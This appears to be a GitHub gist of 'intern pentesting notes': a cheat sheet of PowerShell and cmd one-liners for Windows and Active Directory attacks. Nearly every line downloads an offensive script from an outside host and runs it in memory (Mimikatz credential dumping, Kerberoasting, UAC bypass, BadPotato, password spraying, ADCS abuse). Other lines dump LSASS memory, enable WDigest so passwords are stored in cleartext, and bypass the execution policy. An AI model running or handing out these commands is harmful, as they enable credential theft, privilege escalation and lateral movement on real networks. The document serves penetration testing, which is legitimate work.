Last active
July 27, 2024 09:42
-
-
Save moscowchill/cb9733f3aaf666d7db94e69dcd8b1e44 to your computer and use it in GitHub Desktop.
Intern Pentesting notes
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
[+] Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing. | |
#Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command] | |
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'" | |
#Invoke-Mimikatz: Dump credentials from memory | |
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds" | |
#Import Mimikatz Module to run further commands | |
powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1')" | |
#PowerUp: Privilege escalation checks | |
powershell.exe -exec Bypass -C “IEX (New-Object Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1’);Invoke-AllChecks” | |
[+] Example | |
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1'); Get-DomainUser | Select-Object samaccountname, emailaddress | Export-Csv -Path "H:\Desktop\UserEmails.csv" -NoTypeInformation | |
#Invoke-Inveigh and log output to file | |
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Kevin-Robertson/Inveigh/master/Inveigh.ps1');Invoke-Inveigh -ConsoleOutput Y –NBNS Y –mDNS Y –Proxy Y -LogOutput Y -FileOutput Y" | |
#Invoke-Kerberoast and provide Hashcat compatible hashes | |
powershell.exe -exec Bypass -C "IEX (New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1') ; Invoke-Kerberoast -OutputFormat HashCat|Select-Object -ExpandProperty hash | out-file -Encoding ASCII kerb-Hash0.txt" | |
[+] Check users privs | |
net user /domain ticketsamname | |
#Invoke-ShareFinder and print output to file | |
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1');Invoke-ShareFinder -CheckShareAccess|Out-File -FilePath sharefinder.txt" | |
#Import PowerView Module to run further commands | |
powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1')" | |
#Invoke-Bloodhound dconly because speed | |
powershell.exe -exec Bypass -C "IEX(New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/puckiestyle/powershell/master/SharpHound.ps1');Invoke-BloodHound -CollectionMethod DCOnly" | |
#Find GPP Passwords in SYSVOL | |
findstr /S cpassword $env:logonserver\sysvol\*.xml | |
findstr /S cpassword %logonserver%\sysvol\*.xml (cmd.exe) | |
#Run Powershell prompt as a different user, without loading profile to the machine [replace DOMAIN and USER] | |
runas /user:DOMAIN\USER /noprofile powershell.exe | |
#Insert reg key to enable Wdigest on newer versions of Windows | |
reg add HKLM\SYSTEM\CurrentControlSet\Contro\SecurityProviders\Wdigest /v UseLogonCredential /t Reg_DWORD /d 1 | |
#Run Winpeas and run all checks | |
powershell "IEX(New-Object Net.WebClient).downloadString('https://raw.githubusercontent.com/carlospolop/PEASS-ng/master/winPEAS/winPEASps1/winPEAS.ps1')" | |
#Run Rubeus and run triage command | |
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-Rubeus.ps1'); Invoke-Rubeus triage | |
#Manual Procdump for offline mimikatz | |
.\procdump.exe -accepteula -ma lsass.exe lsass.dmp | |
#Check always install elevated | |
reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer | |
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer | |
#BadPotator exploit which requires impersonate privs | |
iex ((New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/IAMinZoho/OFFSEC-PowerShell/main/Invoke-BadPotato.ps1')); Invoke-BadPotato | |
#Watson nextgen rastamouse exploit suggestor | |
iex ((New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/IAMinZoho/OFFSEC-PowerShell/main/Invoke-SharpWatson.ps1')); Invoke-watson | |
#domain password spraying | |
iex ((New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/shorefall/DomainPasswordSpray/master/DomainPasswordSpray.ps1')); Invoke-DomainPasswordSpray -Password Zomer2023! | |
or | |
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/shorefall/DomainPasswordSpray/master/DomainPasswordSpray.ps1'); Invoke-DomainPasswordSpray -Password Zomer2023! | |
#winpwn all kinds of windows exploitation tools | |
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/master/WinPwn.ps1'); winpwn | |
#adcspwn | |
iex(new-object net.webclient).downloadstring('https://gist.githubusercontent.com/shorefall/ee5fa2aaec8c3d6478ded6ce43986cf8/raw/bea30382ac72f2298d050e86e7ad069919281c37/ADCSpwn.ps1'); Invoke-ADCSPwn | |
#Amnesiac is a post-exploitation framework designed to assist with lateral movement within active directory environments. | |
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/Leo4j/Amnesiac/main/Amnesiac.ps1');Amnesiac | |
IF powershell is restricted with exec policy or ssl issues add: | |
Set-ExecutionPolicy Bypass -Scope Process -Force; [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072; iex etc etc |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment